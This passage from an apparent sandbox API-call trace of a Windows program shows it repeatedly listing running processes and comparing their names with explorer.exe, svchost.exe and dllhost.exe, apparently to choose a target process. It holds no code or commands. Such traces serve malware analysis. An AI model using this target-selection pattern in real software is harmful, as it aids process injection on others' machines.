Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.070] CloseHandle (hObject=0xd8) returned 1 [0224.070] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0224.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0224.071] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.071] CloseHandle (hObject=0xd8) returned 1 [0224.071] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0224.071] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0224.071] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0224.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0224.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0224.072] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.072] CloseHandle (hObject=0xd8) returned 1 [0224.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0224.073] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.073] CloseHandle (hObject=0xd8) returned 1 [0224.073] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0224.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0224.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.074] CloseHandle (hObject=0xd8) returned 1 [0224.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0224.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0224.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.075] CloseHandle (hObject=0xd8) returned 1 [0224.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0224.075] CloseHandle (hObject=0xd4) returned 1 [0224.075] Sleep (dwMilliseconds=0x3e8) [0225.086] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0225.088] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0225.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0225.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0225.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0225.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0225.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0225.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0225.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0225.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0225.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0225.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0225.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0225.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0225.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0225.096] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0225.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0225.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0225.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0225.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0225.099] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.099] CloseHandle (hObject=0xd8) returned 1 [0225.099] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0225.099] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0225.099] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0225.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0225.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0225.100] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.100] CloseHandle (hObject=0xd8) returned 1 [0225.100] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0225.100] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0225.100] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0225.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0225.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0225.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0225.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0225.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.102] CloseHandle (hObject=0xd8) returned 1 [0225.102] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0225.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0225.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.103] CloseHandle (hObject=0xd8) returned 1 [0225.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0225.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0225.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.103] CloseHandle (hObject=0xd8) returned 1 [0225.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0225.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0225.104] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.104] CloseHandle (hObject=0xd8) returned 1 [0225.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0225.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0225.104] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.104] CloseHandle (hObject=0xd8) returned 1 [0225.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0225.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0225.105] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.105] CloseHandle (hObject=0xd8) returned 1 [0225.105] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0225.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0225.105] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.106] CloseHandle (hObject=0xd8) returned 1 [0225.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0225.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0225.106] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.106] CloseHandle (hObject=0xd8) returned 1 [0225.106] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0225.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0225.107] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.107] CloseHandle (hObject=0xd8) returned 1 [0225.107] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0225.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0225.107] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.107] CloseHandle (hObject=0xd8) returned 1 [0225.107] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0225.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0225.108] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.108] CloseHandle (hObject=0xd8) returned 1 [0225.108] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0225.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0225.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.109] CloseHandle (hObject=0xd8) returned 1 [0225.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0225.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0225.109] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.109] CloseHandle (hObject=0xd8) returned 1 [0225.109] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0225.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0225.110] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.110] CloseHandle (hObject=0xd8) returned 1 [0225.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0225.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0225.110] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.110] CloseHandle (hObject=0xd8) returned 1 [0225.110] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0225.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0225.111] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.111] CloseHandle (hObject=0xd8) returned 1 [0225.111] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0225.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0225.111] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.112] CloseHandle (hObject=0xd8) returned 1 [0225.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0225.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0225.112] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.112] CloseHandle (hObject=0xd8) returned 1 [0225.112] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0225.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0225.113] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.113] CloseHandle (hObject=0xd8) returned 1 [0225.113] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0225.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0225.113] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.113] CloseHandle (hObject=0xd8) returned 1 [0225.113] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 